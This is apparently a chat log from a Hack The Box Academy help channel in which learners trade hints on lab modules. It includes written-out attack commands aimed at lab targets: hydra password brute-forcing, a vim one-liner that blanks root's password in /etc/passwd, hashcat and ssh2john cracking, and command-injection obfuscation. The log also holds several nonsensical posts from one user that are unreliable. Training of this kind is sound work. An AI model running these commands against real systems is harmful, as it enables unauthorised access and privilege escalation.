acoustic owl
#

use double [[if...]]

acoustic owl
#

Think about what exactly hydra does and what exactly hydra needs to do it.

compact jacinth
tulip dragon
#

still not getting right ans

acoustic owl
acoustic owl
tulip dragon
#

so my initial code was giving me the ans but it was wrong but now i though it could be +1 or -1 of the output and as soon as i inputed +1 my ans become right

#

now i am thinking hard what i could do to get the right ans witout increase it manually

#

and by thinking for few min i think culprit was echo -n

#

without -n i got the right ans

#

🙂

high zinc
#

Is Information Gathering - Web Edition, "vHosts" section broken?

#

I'm tasked to find 4 flags on 4 subdomains. I find them, but two flags are identical and obviously only work for one answer

#

Also one question says Enumerate the target and find a vHost that contains flag No. 3 but the flag that works for this question starts with something along the lines of HTB{flag_four_...

#

(coincidentally the question mentioning a "flag No. 4" is the one I can't submit an answer for, with the 4th subdomain I found)

#

maybe there's a 5th flag that works for the 4th flag question........ KEKW

tulip dragon
#

i got all the flags

high zinc
#

can I DM you to confirm pls?

tulip dragon
#

sure

compact jacinth
# acoustic owl Yes, the names are wrong.

hydra -l user -P /usr/share/wordlists/rockyou.txt -f 94.237.62.195 -s 37272 http-post-form “/admin_login.php:username=^USER^&paswords=^PASS^:F=<form name=’login’” I got to this point but now i get error instead

acoustic owl
compact jacinth
# acoustic owl Look at the source code. The names are wrong.

I Did this now and succeded sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 94.237.62.195 -s 37272 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='login'"

#

but i do not get forward when i type username and password on the admin page

acoustic owl
compact jacinth
#

Can you please show me whats wrong with this @acoustic owl

#

i have been sitting with one question all day I cant see whats wrong

acoustic owl
#
compact jacinth
#

i checked the link but I still dont see it

acoustic owl
#

Have a look at the source code and then search for password

#

Think about how hydra works and what hydra does exactly. Then think about which things you pass on to hydra...

neon depot
#

twilit gull
acoustic owl
compact jacinth
acoustic owl
#

There is one more HTML element name that is also wrong. Look in the source code of the website.

#

and use sudo only when it is really needed

compact jacinth
acoustic owl
compact jacinth
#

Okey no more sudo but I have been reading through the whole module and I cant find the answer for whats wrong

acoustic owl
#

Because the module does not give you 1:1 instructions that you can simply copy.
You need to understand what hydra does exactly.
Then look at your command and look at the source code of the website, then you know what you need to change.

compact jacinth
#

but now i got it atleast

#

thank for the help

zinc rampart
#

whats the best books for hacking for beginners

south egret
#

hello there I'm actually on the AD Administration: Guided Lab Part II.
After aplying with this command

Add-Computer -ComputerName ACADEMY-IAD-W10 -LocalCredential ACADEMY-IAD-W10\image -DomainName INLANEFREIGHT.LOCAL -Credential INLANEFREIGHT\htb-student_adm -Restart

I try to Check OU Membership of a Host with the command :

Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties * | select CN,CanonicalName,IPv4Address

But got the error message :

Get-ADComputer : The server has rejected the client credentials.
At line:1 char:1
+ Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : SecurityError: (INLANEFREIGHT\htb-student_adm:ADComputer) [Get-ADComputer], Authenticati
   onException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.Security.Authentication.AuthenticationException,Microsoft.A
   ctiveDirectory.Management.Commands.GetADComputer

Can anyone explain to me what I am doing wrong?

cedar void
acoustic owl
cedar void
#

So how do I figure out what DNS resolver to ask for

acoustic owl
cedar void
willow sonnet
#

is there something wrong with HTB today? my box always seems to die after a set amount of time

cedar void
acoustic owl
#

the first is from Cloudflare
the second one is from google

cedar void
acoustic owl
cedar void
acoustic owl
cedar void
#

DNS server?

acoustic owl
#

Ask this server

cedar void
# acoustic owl Ask this server

I am not sure how to ask dns server anything given that when I asked chat gpt this question , they return these suggestions that I previously tried but it failed for me

acoustic owl
#

or with dig
dig example.com @10.10.10.10

cedar void
acoustic owl
#

yes of course 🙂

carmine sleet
heavy dome
#

Hi, I'm at password attacks hard module, I found ||johanna credentials and I'm trying with hashcat to decrypt keepass login|| but I can't it's spending a lot of time without finding the key, any hits? thanks

restive hound
#

Good morning everyone! I am getting an error when trying to run ssh2john to crack a ssh key. How do I call python 2 to run when trying to run ssh2john instead of python3? Thank you for your help!

restive hound
vital adder
#

first did you run cmd as administrator? also you can tru tools like cme for this

zealous fiber
vital adder
vital adder
rustic sage
#

hello

#

ima newbie

#

i want to learn to hack

#

how do i do so?

compact patrolBOT
vital adder
#

best thing i can give you about that without directly giving you the answer is google

heavy dome
#

don't work

vital adder
#

of course don't use those

#

after hashcat is done add --show in the end of your hashcat command run it again

heavy dome
#

not work

vital adder
#

then hashcat probably didn't crack the hash

#

what wordlist did you use?

hexed void
#

Anyone know why I'm not able to connect? It's the first lesson of the windows module.

#

The code is the same that they use in the example, but I get certificate errors instead of a remote windows unit

vital adder
#

try /cert:ignore

hexed void
#

that would go after the initial line?

vital adder
#

at the end yes

#

but is the given password Password?

hexed void
#

It would appear so yes

#

maybe I'll try to password they used for themselves in their video example, that eliminated the cert issue now it's a logon issue

restive hound
#

So I tried using the python2.7 /usr/share/john/ssh2john.py but I am getting a permission denied.. Any ouput I put it denies me. I have never felt so dumb

vital adder
heavy dome
vital adder
#

send me a screenshot of that hashcat command but with the --show at the end

heavy dome
#

||hashcat -m 13400 -a 0 hashjohannakeepass mut_password.list -S||

vital adder
#

i mean a screenshot of what happen when you run it

hexed void
#

This is the instructions given, however the above video example in the module used a password that ended up working for me. Maybe we should update the written password from Password, it seems like a pretty straight forward instruction.

heavy dome
hexed void
#

this is the example I'm referring to

vital adder
hexed void
#

I used our target IP, This is introduction to windows as a part of cyber security fundamentals

#

lesson 1

vital adder
#

the windows fundamentals module?

vital adder
# heavy dome

no idea what's the issue this part is straightforward but shoot me a dm with that hash

hexed void
#

Yes, module 1 Windows Fundamentals

vital adder
#

under the Questions part it's clearly started that RDP to with user "htb-student" and password "Academy_WinFun!"

hexed void
#

Okay, I see that now, I still don't understand why you would give a direct connecting command to use arbitrarily

vital adder
#

also you may want to do the intro to academy module because you are on the module Windows Fundamentals and Introduction to Windows section there is no number for the academy modules

hexed void
#

This is my 4th module within my current path

#

I've already done the intro to academy, it's the first path everyone has to take

#

I just finished intro to linux.

echo roost
#

I can't remove the ||x ||for root in this section - https://academy.hackthebox.com/module/51/section/1844 using ||/usr/bin/vim.basic /etc/passwd ||and editing or the command provided ||echo -e ':%s/^root:[^:]*:/root::/\nwq' | /usr/bin/vim.basic -es /etc/passwd||. The capabilities are these per enumeration in the screenshot. Can someone help me with what i'm missing?

vital adder
#

try with ! so nwq!

echo roost
#

ty

echo roost
vital adder
#

for why that work i got no idea that's what i have in my note lol and yes you should be able to do this manually

#

oh wait it's vim so wq is for write + quit but i always use wq! to exit vim

echo roost
#

oh I see

#

I barely use vim. I'm a nano fan. Probably should learn it more

vital adder
#

i mean vim have multiple article about how to exit it 🤣

echo roost
candid lily
#

anyone done command injections module?

#

???

subtle mauve
#

Any help with Footprinting medium? I don't understand, even after connecting the the MSSQL server and opening every single table and folder in that DB, there is no relevant information regarding the user HTB, what am I supposed be looking for?

tight mesa
#

hello y'all, I'm having this issue with Msf::OptionValidateError The following options failed to validate: SESSION

candid lily
#

i need help with advanced command obfuscation

subtle mauve
candid lily
tight mesa
#

what I'm trying to set an autorute in MSF, I replicate the commands explained in the module

#

googling I couldn't find something useful, any idea what I'm missing or doing wrongly?

acoustic owl
candid lily
#

find command is incompatible with tail

#

it keeps saying find -n: unknown predicate

candid lily
acoustic owl
candid lily
#

oh i forgot to mention its inside a subshell $()

#

try to use find and tail -n with $() , find keeps taking -n as its argument rather than tail

#

how can i post a screen shot

acoustic owl
candid lily
#

exactly

#

but it tries to get and that gives error

acoustic owl
#

read the man page which I have linked above

candid lily
acoustic owl
#

You do not pass tail a text file

candid lily
#

i need to use tail on output of find

#

to be exact this is what i need to do

acoustic owl
candid lily
#

they use subshells for these bypassing but i cant use that for some reason

acoustic owl
#

Find the output of the following command using one of the techniques you learned in this section:

candid lily
#

the other technuques are similar only they all use subshells

#

one reverses the command and another changes case of command but they both use subshells to execute

#

without tail it worked and it showed a load of output

#

i then tried to manually scroll down and get to last one but it was not accepted as right answer

acoustic owl
#

The module shows you how to obfuscate a command. Use this technique

candid lily
acoustic owl
pulsar willow
#

Use a modul-figurant at the end of the ESC tablet

acoustic owl
#

The command already specifies in the question. You only have to modify/obfuscate it so that you can submit it.

pulsar willow
#

The compressor uses L-lite modullars for the screen to twist

lusty thicket
lusty thicket
#

¯_(ツ)_/¯

candid lily
acoustic owl
acoustic owl
candid lily
#

but then to decode and run them i need to use subshell

#

but then find and tail are hating each other

acoustic owl
pulsar willow
#

It¨s a command liner that's systematicly doing this

lusty thicket
# candid lily

(tail -n 1 < <(find /usr/share/ |grep root | grep mysql | base64) | base64 -d

#

idk tho i haven’t done that module before

candid lily
#

i could bypass commands by adding quotes but i cannot bypass pipe without using subshells right

acoustic owl
pulsar willow
#

tailness

candid lily
candid lily
#

can i get a hint atleast, like without subshell how is it even possible

#

even the machine reset like 4 times :(

acoustic owl
candid lily
#

shit i finally finished it i used ||eval|| is that what you were hinting

pulsar willow
#

The cyber network files are not in the Linux, linus, grants of the debugger granting it

acoustic owl
#

Read the Chapter ||Encoded Commands|| again

runic rampart
#

Good afternoon! Excuse me for bothering the community on such a simple issue. Who was able to answer the question: "Bloodhound - Skill Assessment," B: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Enter a number as the answer (up to two decimal places, i.e. 11.78).

high reef
#

Hey all, I'm doing "Initial Enumeration of the Domain"

#

so i launch wireshark in pwnbox and i'm gettting this error message

#

nvm i got it to work

acoustic owl
untold knot
#

Module: CROSS-SITE SCRIPTING (XSS) - Session Hijacking
From my vm and from pwnbox I can't connect to the server.
I tried the url with http, but it automatically set it back to https.
To get a connection I changed the server. Generated new files for openvpn and tried to use the pwnbox. With pwnbox I had temporaly a connection. What can I do now?

orchid pine
#

anyone did the password hardlab

#

i want to ask him

acoustic owl
#

What do you want to ask him?

orchid pine
#

About how you can get the file without the smb

#

Using the nfs ?

tawdry vapor
#

anyone can help me with attacking common services module, in the Attacking smb?

#

i'm trying to brute force user jason, but it's not working

acoustic owl
acoustic owl
tawdry vapor
acoustic owl
tawdry vapor
#

yes

#

i tryed too msfconsole

#

buts not working too

acoustic owl
tawdry vapor
#

yeah

#

i restart the lab and i got it

#

thanks man

orchid pine
#

smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT im getting this error since the morning

#

noe its 2 days and i cannot get it

static roost
#

#Module: DACL Attacks I
#Section: DACLs Overview
#Sub-section: Local Kernel Debugging

It briefly glosses over using windbg and local kernel debugging, yet I have absolutely no clue how to use either. Searching "windbg" in HTB Academy only turns up the DACL Attack module. Can anyone point me in the right direction here?

acoustic owl
#

maybe try it with PwnBox

acoustic owl
elfin cedar
#

I can't scp the shadow.bak to my machine so I can unshadow

elfin cedar
#

lol

#

I get an error

acoustic owl
#

You have to upload the whole zip file.

elfin cedar
#

thanks for the tip

#

oh for real?

static roost
#

@acoustic owl Very well. Thank you.

steep niche
#

I'm sorry if this is off topic but I just joined the server and I have some problems

elfin cedar
#

wait the exe, standalone?

steep niche
#

Can someone help pls?

orchid pine
#

yeah sure go ahead

steep niche
#

So I opened a htb account on my laptop but the email was the wrong one so now it keeps me at verify your email page and won't let me sign in with my other account

orchid pine
#

u can reach the support for this question

steep niche
#

Idk where

#

Sorry

acoustic owl
elfin cedar
#

I guess Ill keep trying idk

#

python is not even installed on the target machine though?

#

this is crazy

acoustic owl
acoustic owl
#

you are logged in with kira, right?

elfin cedar
#

yes

#

I tried python --version but nothing shows up

#

also:

acoustic owl
#

try python3

elfin cedar
#

omg for real??

#

python3 --version is different than python --version??

#

omg @acoustic owl you know what I did

#

thanks for helping me by the way

#

when I was trying the python command, i didn't capitalize the Z in lazagne so it said no file

#

Im sorry, i am literally at my wit's end when I come in here

acoustic owl
elfin cedar
merry cliff
#

Hi there
Sorry to bother you
Is there any ethical hacker? I need some help

lusty thicket
vital adder
vital adder
# south egret any advice please ?

by Guided Lab Part II you mean the skill assessment II right? if yes then hint you can't add a computer also there is no user with the username of htb-student_adm

trail depot
#

It's the Introduction to AD module

trail depot
#

It's because image is a local account that you just use to setup and not a domain account, so you don't have rights to get info about the domain I think

#

If you still login as image you can also just specify the credentials again
Get-ADComputer -Identity "ACADEMY-IAD-W10" -Properties * -Credential INLANEFREIGHT\htb-student_adm | select CN,CanonicalName,IPv4Address

orchid pine
#

can i ask

#

what a rabbit hole

analog dock
#

So you dive in with full confidence, but in actuality it’s a waste of time

orchid pine
#

in see thankj you

orchid pine
# acoustic owl try `mget *`

the get and mget bouth are not working on my attack box same probleme timeoput but on the pwn box its is working

#

it feel so uncomfortable to work with the pwn box

#

is there annything else i can try to get the file

normal sand
#

Module: Linux Fundamentals

Page 12: Filter Contents

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

I've already tried working on it myself and searching online but am struggling. Any help is greatly appreciated.

normal sand
fathom pendant
#

Look at the man page for cut and look at what the -d flag is

#

:) you can learn a lot about a command from its man page or -h (--help) flag [if it has one]

normal sand
fathom pendant
#

Yep

#

That's basically it

normal sand
#

From my understanding so far, the cut command should only get rid of double or single quotes at the beginning of the URL?

fathom pendant
#

Because if you're grabbing the source code, a lot of times links will be in single or double quotes

normal sand
fathom pendant
#

Yep

#

Because the delimiter is saying "hey we are breaking here" so it's excluding the delimiter

normal sand
fathom pendant
#

-f is telling it which side of the delimiter to use

frozen sail
#

Can anyone teach me hacking?

fathom pendant
frozen sail
#

Thank you

fathom pendant
frozen sail
#

Ok sure

digital inlet
#

INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC Skills Assessment hunt2, I have been looking for the answer for a long time, can anyone give me a hint?

#

The query fields I use are event.code:"13" and process.name:"default.exe"

normal sand
# fathom pendant -f is telling it which side of the delimiter to use

So, f2 indicates the right-hand side? So, then it should keep text from the right-hand side, no?

Let's say I have a file test.txt with the following content

something"www.google.com"something

When I run the following command:

cat test.txt | cut -d'"' -f2

Shouldn't the output keep text only from the right-hand side? So, I would expect the output to be www.google.com something but the output is instead www.google.com

fathom pendant
#

-f is the field

#

Try echo www.google.com | cut -d'.' -f3

normal sand
#

Now I get it.

#

Thanks a lot!

fathom pendant
#

Each field is separated by the delimiter

#

And -f tells you which

#

-f1 would be before the first delimiter,

normal sand
fathom pendant
#

Yep

fathom pendant
#

"\n" is the standard new line operation

#

For instance in most programming languages you can add a new line to break text up with \n

normal sand
#

I wasn't aware the \n would work for text files in that manner. At first I thought it would just insert it as a string instead of behaving as the new line operation. Good to know.

#

Thanks for all your help.

celest iris
#

Hi i am new to networking and doing INTRODUCTION TO NETWORKING I'm stuck on the Subnetting Questions just not understanding how to Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer. And Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.

frozen sail
#

bruh

#

what was the prob with my name

candid lily
#

whats wrong with bashfuscator

fathom pendant
steep night
#

@thorn urchin

thorn urchin
frozen sail
thorn urchin
#

nope

frozen sail
#

my name was joy

#

is it smth bad?

thorn urchin
#

no your account is just unverified

#

thats why your name is white

fathom pendant
#

Are you sure you're doing mssql and not mysql.

#

clarifying: I meant you're using mssql to connect

heavy dome
#

yes

candid lily
#

what they teach you vs what they ask in exam bruh its too hard

fathom pendant
#

Wdym?

#

It's telling you to Auth to that ip with guest:guest and I guess that's lfi?

#

Or remote file read

#

the module definitely should tell you how to get there ¯_(ツ)_/¯

candid lily
#

its command injection but i've been trying for like an hour and made 0 progress

#

the exercises were piece of cake but this skill assement is dead end

fathom pendant
#

Well skill assessments aren't necessarily meant to be easy

#

Just recheck that you've tried all the techniques. And that you've tried slight modifications to the techniques

#

If you can't pass the skill assessment it's a:

acoustic owl
naive bough
#

Hey guys, I wanted to ask what are the best boxes for web pen-testing? or how can i search for them?

#

Oh ok then I just created an account thats why but thanks

potent blade
#

Hi all, would like to seek any hints/tips for this one.
im stucked as user dennis and cannot elevate to root. tried hunting for credentials of root but no luck.
Examine the second target and submit the contents of flag.txt in /root/ as the answer.

fathom pendant
#

Kinda helps if you tell us the module name

potent blade
#

sry, here it is Password Attacks Lab - Medium

candid lily
#

only / and \ are detected but what ever i try to inject it gives code 302 i dont understand why

fathom pendant
heavy dome
#

hit please...

candid lily
#

hmm i think i found something

lusty thicket
potent blade
fathom pendant
candid lily
#

which environment variable contains ; or & or |, i couldnt find any on my pc

#

YESS i finished it finallyl

lusty thicket
candid lily
#

some have ; like LS_COLORS

#

but in the target they were not there

acoustic owl
iron plaza
#

Is there a tech issue with the servers?

#

was in a session then got kicked out but now trying to rdp and it wont go through at all

acoustic owl
iron plaza
#

got this message: [15:42:34:715] [3005:3006] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation [15:42:34:719] [3005:3005] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

burnt spruce
#

i dont understand what path it needs

#

What is the path to htb-student's home directory?
Linux Fundamentals

iron plaza
burnt spruce
iron plaza
heavy dome
#

I am at the module Attacking Common Services: Attacking SQL Databases - I found ||the credentials of mssqlsvc,|| now I don't know what to do, I tried|| login in mssql and rdp|| but nothing

covert blade
#

Hi guys, I'm stuck at the Service Scanning module.
Last question of the exercises.
When I run: smbclient -U bob \\10.129.42.254\users
it asked for the bob password.
Hint is: Bob likes to use weak passwords.
But all my password guess are unssucessful
Can someone help?

autumn pilot
#

Bob's password has been shown in the material of the section

limber river
covert blade
#

okay got it thanks both of you @autumn pilot & @limber river

#

This is my first time with HTB and wooow
this integrated wm and the exercice are truly amazing for practicing

covert blade
#

How good will I be at the end of the pentesting path?

limber river
covert blade
#

what is Cpts?
Intermediate level okay, that already quite a good level

limber river
#

It's like prove of what you have learned

covert blade
#

ah okayyy thanks

#

How do you get such a target machine with vulnerabilities (open port, etc..) that I can play with ?

limber river
covert blade
#

I found some interessting video on youtube, I will try that

#

so one last question please, how long will take to finish the pentest path, If done fulltime (8Hour/day) ?

analog dock
tribal rain
#

hi all, I am trying to run ligolo-ng on the internal info gathering (attacking enterprise applications) and I am getting this error however I have been told it works

vital adder
#

if you are using an arm agent try the amd agent

tribal rain
#

ahhhh its x64 and target is x86

mossy urchin
#

guys

#

does cancelling student subscription, removes your access immediately? or will it be gone by the next renewal date?

limber river
cedar void
#

Am I already logged in or should I wait a while?

mossy urchin
lusty thicket
vital adder
#

hint domain login

vital adder
cedar void
vital adder
#

just set verbose true

unreal peak
#

one of my server is cyberbullying me by giving me inappropriate username what to do

vital adder
#

Sir this is a Wendy's

limber river
#

How much time it takes you to finish passwords attack?

urban sage
orchid pine
#

on hard lab

limber river
leaden pond
#

I'm working on Question 2 of the Limited File Uploads section of the File Upload Attacks module. I'm asked to view the source code of upload.php in order to get some information about the name of the uploads directory for this web app. I'm able to view the source code for uploads.php, but all it says is "Only SVG images are allowed." I don't see any information relevant to the uploads directory for the web app in the source code for upload.php.

brave timber
#

hello, i wanna know if i can use the Pwnbox time that i have from the Academy , for the CTF on the machines.

is that possible? or is only for the academy?

sly kelp
#

It's only for academy platform

vital adder
brave timber
#

i understand, thank you both

vital adder
orchid pine
#

─$ hashcat -m 22100 /home/shadowalker/Downloads/mut_password.list backup.hash -o backup.cracked
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]

  • Device #1: cpu-sandybridge-AMD Ryzen 5 5600H with Radeon Graphics, 2819/5702 MB (1024 MB allocatable), 6MCU

Minimum password length supported by kernel: 4
Maximum password length supported by kernel: 256

Counted lines in /home/shadowalker/Downloads/mut_password.listInsufficient memory available
zsh: segmentation fault hashcat -m 22100 /home/shadowalker/Downloads/mut_password.list backup.hash

#

hashcat wont work

#

anyone faced this prbleme befor

#

can help me plz

#

the virtual machine has 8 gb ram + 6 cpu

#

edit never mind

#

soryy guys

leaden pond
# vital adder by "read the source code" they don't mean `ctrl + U` (in case that's what you di...

I used the exact same technique I used for the first question but changed "flag.txt" to "upload.php." But when I look in the same spot where I looked for the content of flag.txt, I don't see anything. One uncertainty I have is that I knew flag.txt was in the root directory, but I don't know how to specify the path to upload.php since the whole problem is to find the name of the directory it's in.

acoustic owl
woeful vine
#

where can i check the module tier? I want to see if i can access a certain module with a student subscription in htb academy.

acoustic owl
#

It is a Tier III Module

woeful vine
#

ah damn. thanks - damn that really is 50 euros, the heck HTB noah_what

acoustic owl
leaden pond
foggy brook
#

is there anyone who can help me with AD enumeration and Attacks, skills assessment 1?

zinc marsh
#

around 1250 cubes for 58€

thick juniper
#

Hi everyone, got a question about the Linux Priv Esc: Python Library Hijacking module. The question asked to follow though the examples given to get the flag in root, but I’ve found that some bits are not the same on the box that seem to be crucial to being able to work the examples, like the init.py file being unwritable to my user. I tried the other files in the list and those aren’t writable to the user either, and I can’t move things to the /tmp file to call my psutil.py file from there either. My brain is a bit fried so I probably missed something simple, but has anyone else had issues with this module?

trail depot
# thick juniper Hi everyone, got a question about the Linux Priv Esc: Python Library Hijacking m...

I remember having similar issues and just checked, but method 1 should still work because you own the __init__.py file

ls -la /usr/local/lib/python3.8/dist-packages/psutil/__init__.py
-rw-r--r-- 1 htb-student staff 87657 Jun  8 09:21 /usr/local/lib/python3.8/dist-packages/psutil/__init__.py

To try out method 2 and 3, I remember getting root with method 1 and modifying permissions for /usr/lib/python3.8 for method 2 and maybe change /etc/sudoers file for method 3

orchid pine
#

finally guys special thx to the best guys here on the server and they helped me a lot throu this module ❤️ @acoustic owl @vital adder @rustic sage @fiery berry

hidden obsidian
#

@vestal wing I'm going through the Game Hacking fundamentals course, where is the Hackman.exe file supposed to live? It doesn't appear to be included in the CheatEngine zip.

limber river
#

Anyone having any problem with labs? , I can't ping the labs

fathom pendant
orchid pine
#

is it against the rules even tho i know theme

#

im so soryy if its so

acoustic owl
#

The online policeman here warns you immediately if you mark too many people at the same time.
This obviously did not happen here, so all is well.

limber river
#

Idk what to do

split thistle
#

I got a qst please in the section password attacks module, more specifically pass the hash part. We performed pth using mimikatz to access to a share over the network \DC01\user and then we performed pth using Invoke-TheHash to access to C:\julio\flag.txt. My qst is why C:\julio\flag.txt exists when performing pth with Invoke-TheHash meanwhile i cant find it using mimikatz ? Thanks in advance

pulsar willow
#

do a dll. swap to node the statement files

#

the format doesn't reveal any domenstics cases of anything either